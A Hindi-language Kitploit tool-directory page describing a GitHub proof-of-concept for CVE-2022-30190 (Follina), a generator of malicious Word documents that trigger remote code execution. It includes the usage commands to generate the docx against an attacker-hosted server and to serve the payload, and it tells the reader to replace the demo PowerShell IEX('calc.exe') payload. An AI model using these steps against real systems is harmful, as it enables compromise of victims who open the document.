Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-30190 — MS-MSDT Follina CVE-2022-30190 PoC दस्तावेज़ जनरेटर | Kitploit
उपकरण/GitHubGitHub/sudoaza/cve-2022-30190
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubsudoaza/cve-2022-30190

CVE-2022-30190

MS-MSDT Follina CVE-2022-30190 PoC दस्तावेज़ जनरेटर

रिपॉजिटरी देखें
7214 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MS-MSDT Follina CVE-2022-30190 PoC

Microsoft Office Word में रिमोट कोड निष्पादन (Remote Code Execution) का शोषण करने के लिए दुर्भावनापूर्ण docx जनरेटर

इस स्क्रिप्ट का निर्माण LockedByte द्वारा CVE-2021-40444 PoC और Tothi द्वारा writeup पर आधारित है।

उपयोग

सबसे पहले backup.html को संशोधित करें और powershell पेलोड को बदलें। अभी यह सिर्फ IEX('calc.exe') का उपयोग करके एक calc.exe खोलता है।

python3 exploit.py generate http://<SRV IP>

दस्तावेज़ निर्माण

एक बार जब आप दुर्भावनापूर्ण docx उत्पन्न कर लें (यह out/ पर होगा), आप सर्वर सेटअप कर सकते हैं:

sudo python3 exploit.py host 80

सर्वर

अंत में, docx को Windows वर्चुअल मशीन में आज़माएँ:

कैल्क खुला

टूल डाउनलोड करें